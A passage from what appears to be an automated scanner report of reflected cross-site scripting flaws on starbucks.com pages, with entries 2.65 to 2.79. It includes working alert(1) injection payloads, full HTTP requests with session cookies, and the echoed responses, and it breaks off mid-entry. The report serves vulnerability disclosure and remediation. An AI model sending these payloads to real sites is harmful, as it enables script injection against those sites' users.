<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
pt">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96861445001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/entertainment?90a4e";alert(1)//d2bb761e82e=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.65. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4131d"style="x:expression(alert(1))"c25fff327f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps?4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 40635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?4131d"style="x:expression(alert(1))"c25fff327f9=1"/>
...[SNIP]...

2.66. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fa55"%3balert(1)//0b5e66ea4df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa55";alert(1)//0b5e66ea4df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/mobile-apps?7fa55"%3balert(1)//0b5e66ea4df=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:57 GMT
Connection: close
Content-Length: 40540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890007001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/mobile-apps?7fa55";alert(1)//0b5e66ea4df=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.67. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae0f9"style="x:expression(alert(1))"6743e2ed601 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/mystarbucks?ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:36 GMT
Connection: close
Content-Length: 37985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?ae0f9"style="x:expression(alert(1))"6743e2ed601=1"/>
...[SNIP]...

2.68. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed19c"style%3d"x%3aexpression(alert(1))"695c8291744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed19c"style="x:expression(alert(1))"695c8291744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style%3d"x%3aexpression(alert(1))"695c8291744=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:30 GMT
Connection: close
Content-Length: 38490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style="x:expression(alert(1))"695c8291744=1"/>
...[SNIP]...

2.69. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21513"style="x:expression(alert(1))"30c5ed9534e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 39080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style="x:expression(alert(1))"30c5ed9534e=1"/>
...[SNIP]...

2.70. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5833a"style%3d"x%3aexpression(alert(1))"12718e18e54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5833a"style="x:expression(alert(1))"12718e18e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/store-design?5833a"style%3d"x%3aexpression(alert(1))"12718e18e54=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:20 GMT
Connection: close
Content-Length: 43622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?5833a"style="x:expression(alert(1))"12718e18e54=1" />
...[SNIP]...

2.71. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a344c"style="x:expression(alert(1))"5d8d4bfdaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet?a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:38 GMT
Connection: close
Content-Length: 38028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a344c"style="x:expression(alert(1))"5d8d4bfdaf3=1"/>
...[SNIP]...

2.72. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95eff"style%3d"x%3aexpression(alert(1))"52d652315b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95eff"style="x:expression(alert(1))"52d652315b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/in-canada?95eff"style%3d"x%3aexpression(alert(1))"52d652315b0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:53 GMT
Connection: close
Content-Length: 38308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?95eff"style="x:expression(alert(1))"52d652315b0=1"/>
...[SNIP]...

2.73. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db28c"style="x:expression(alert(1))"a963d7ce712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network?db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:32 GMT
Connection: close
Content-Length: 38766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?db28c"style="x:expression(alert(1))"a963d7ce712=1"/>
...[SNIP]...

2.74. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c2f"style%3d"x%3aexpression(alert(1))"8870702513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c2f"style="x:expression(alert(1))"8870702513a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service?41c2f"style%3d"x%3aexpression(alert(1))"8870702513a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:03 GMT
Connection: close
Content-Length: 34417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service?41c2f"style="x:expression(alert(1))"8870702513a=1"/>
...[SNIP]...

2.75. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 655a7"style="x:expression(alert(1))"cacda66d35a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/contact?655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:58 GMT
Connection: close
Content-Length: 37233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?655a7"style="x:expression(alert(1))"cacda66d35a=1"/>
...[SNIP]...

2.76. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58e00"style="x:expression(alert(1))"c89dda96f09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/card?58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:06 GMT
Connection: close
Content-Length: 87900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?58e00"style="x:expression(alert(1))"c89dda96f09=1"/>
...[SNIP]...

2.77. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64c52"style="x:expression(alert(1))"411f5c964e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffee?64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:48 GMT
Connection: close
Content-Length: 37606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?64c52"style="x:expression(alert(1))"411f5c964e5=1"/>
...[SNIP]...

2.78. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835ba"style%3d"x%3aexpression(alert(1))"de67136c231 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835ba"style="x:expression(alert(1))"de67136c231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffeehouse?835ba"style%3d"x%3aexpression(alert(1))"de67136c231=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 59203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?835ba"style="x:expression(alert(1))"de67136c231=1"/>
...[SNIP]...

2.79. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
